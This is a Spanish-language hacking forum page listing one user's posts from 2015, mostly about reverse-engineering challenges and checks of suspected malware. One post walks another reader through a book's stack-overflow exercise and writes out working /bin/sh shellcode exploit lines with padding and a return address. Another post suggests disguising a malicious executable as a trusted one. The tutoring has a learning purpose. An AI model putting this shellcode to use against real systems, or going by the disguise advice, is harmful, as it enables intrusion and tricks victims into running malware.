Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - .:UND3R:.

#281
Ingeniería Inversa / Re: [KeygenMe] Matrix
25 Marzo 2015, 20:35 PM
Cita de: MCKSys Argentina en 25 Marzo 2015, 17:39 PM
Como puse en mi post:

Vi todo el tema de la matriz de 3x3 (La del User, la de la pass y la temporal). Pero me pareció que el cálculo final era el que puse...

En fin, está bueno que otros se animen a meterle mano a los retos.

Será que si me equivoco más seguido, habrá más participación???  :xD

Saludos!

Comienza a decir que no se pueden crackear, así participarán todos jaja
#282
En estos casos podrías usar printf() para obtener la dirección de la variable local de destino de la función strcpy(), como dato te comento que el libro lo desarrollé bajo la última versión de Kali Linux (tiene algunas variantes a los paso a paso del libro pero en si es muy similar) No te queda otra que probar imprimir direcciones desde afuera del programa, por cierto me imagino que tu SO es de x86, en esta área debes ser muy paciente y aprender a base de errores (depurar, depurar y depurar) intenta nuevas ideas, estás seguro de la shellcode? Intentate simplemente poner interrupciones INT 0x3 para verificar si alcanzas a llegar? Te recomiendo leer cracking en linux por Juan José (creo que ese era el nombre del autor) leete solo los capítulos GDB I y GDB II para que entiendas el funcionamiento de este fantástico debugger, si eres un peresozo, prueba con EDB (un depurador que es 99% igual a OllyDbg).

Saludos
#283
Algo debe estar fallando, pero no intentaste poner breakpoint, es lo fundamental para entender el flujo del programa, por cierto debes desactivar ASLR cada vez que apagas el equipo, para saber el relleno exacto puedes usar metasploit o gspattern.pl:
https://securitythoughts.wordpress.com/2010/03/18/tool-unique-pattern-generator-for-exploit-development/

Yo creo el error es completamente tuyo o no estás rellenando la cantidad de bytes exactos, no está alineado, la shellcode no es la correcta, aquí debes usar siempre BP recuerda eso, coméntame si te resultó alguna de estas sugerencias.
#284
Yo hace unos días me terminé el libro, solo te diré que si te complicó el principio del libro, te tengo malas noticias el capítulo Heap Overflow y Advance Heap Overflow es un terror, por lo menos para mi el segundo fue un caos, no estaba para nada detallado los ataques y tuve que leer bastante documentación para poder entender algo, y luego al fin logré entender casi todo, el libro es excelente, te lo recomiendo al 100% pero requiere de una base algo fuerte a lo que concierne a Ing. Inversa.

Bueno el error que te aparece es más que claro, se está intentando ejecutar una instrucción ilegal, es decir que no permitida, esto puede ocurrir por dos cosas:
1) Se está saltando a una dirección errada y no se está yendo a la shellcode.
2) Se está saltando a una zona intermedia de la shellcode lo cual genera el error.

Veamos tu Payload, debes siempre explicar cada parte de el, ya que casi nadie sabe la representación de hexadecimal a lenguaje ensamblador:

./prog `perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA"."\x80\xf6\xff\xbf"'`

[shellcode][relleno][EIP*]

*sobre-escritura del EIP o dirección de retorno.

Intenta poner una cabecera en antes de la shellcode, te recomiendo NOPs:
./prog `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA"."\x80\xf6\xff\xbf"'`

Debería funcionar, ahora verifica siempre poniendo BP en la zona en donde debería redireccionar el flujo del programa, en este caso "\x80\xf6\xff\xbf"', te daré un truco para que sea más cómodo diseñar tu payload en Perl, no sé por qué el autor del tutorial no lo usa, las direcciones las debes poner en orden little endian, como solución ponlas de forma normal de esta forma:
./prog `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"."AAAAAAAAAAAAAAAAAAAAA" . pack('V',0xbffff680)'`

No es más cómodo?

Cuéntame que tal te va, si tienes dudas por favor dímelas, necesito repasar.

PD: puedes poner el nº de página.
#285
El usuario no creo que posea las habilidades para enfrentarse a fallos de seguridad, por eso no creo que sea necesario detallarle sobre shellcodes, con respecto a camuflar para que complicarse tanto e intentar enviar una imagen o mp3, mejor enviar directamente un exe pero aparentando ser un exe confiable, por lo cual camuflar, bindear, joinear jaja sería una solución válida.
#286
Te dare una pista en este mismo subforo mueve el scroll un poco hacia abajo, te darás cuenta que hace poco preguntaron casi exactamente lo mismo  >:D
#287
Efectivamente, ¿Cómo? Sencillo la instalas y evitas que máquina host como virtual se relacionen (carpeta compartidas), saludos.
#288
Cita de: sadfud en 15 Marzo 2015, 23:08 PM
Parece que al final 79137913 no era tan experto en vb como decia. Ni una disculpa? Ultimo aporte en la comunidad.
Salud

Experto? Nadie aquí se ha nombrado un experto en materia, el realizó un análisis superficial, el cual denotó un comportamiento anómalo, luego otro usuario revisó más a fondo tal comportamiento (copiar un archivo en carpeta %system%) y no arrojó nada, pero debes entender que no es bien presentable un usuario que comparte archivos sin código de fuente, un ejecutable cifrado que no requiere ser cifrado, que el programa que comparte se copie en un PATH tan curioso.
#289
te enseñaré lo que es recursividad, es una reiteración sucesiva que termina cuando una condición se cumple, reiteraré un mensaje tras mensaje cada vez que pregunten por lo mismo y esta condición dejará de cumplir hasta que el día en que entiendas que hay que buscar antes de abrir la boca:

http://foro.elhacker.net/dudas_generales/me_gustaria_tener_un_mentor_que_me_pueda_guiar-t431532.0.html;msg2001530#new
#290
Efectivamente está limpio como comenta sadfud, pueden ver el análisis realizado:
http://foro.elhacker.net/ingenieria_inversa/posible_malware-t431727.0.html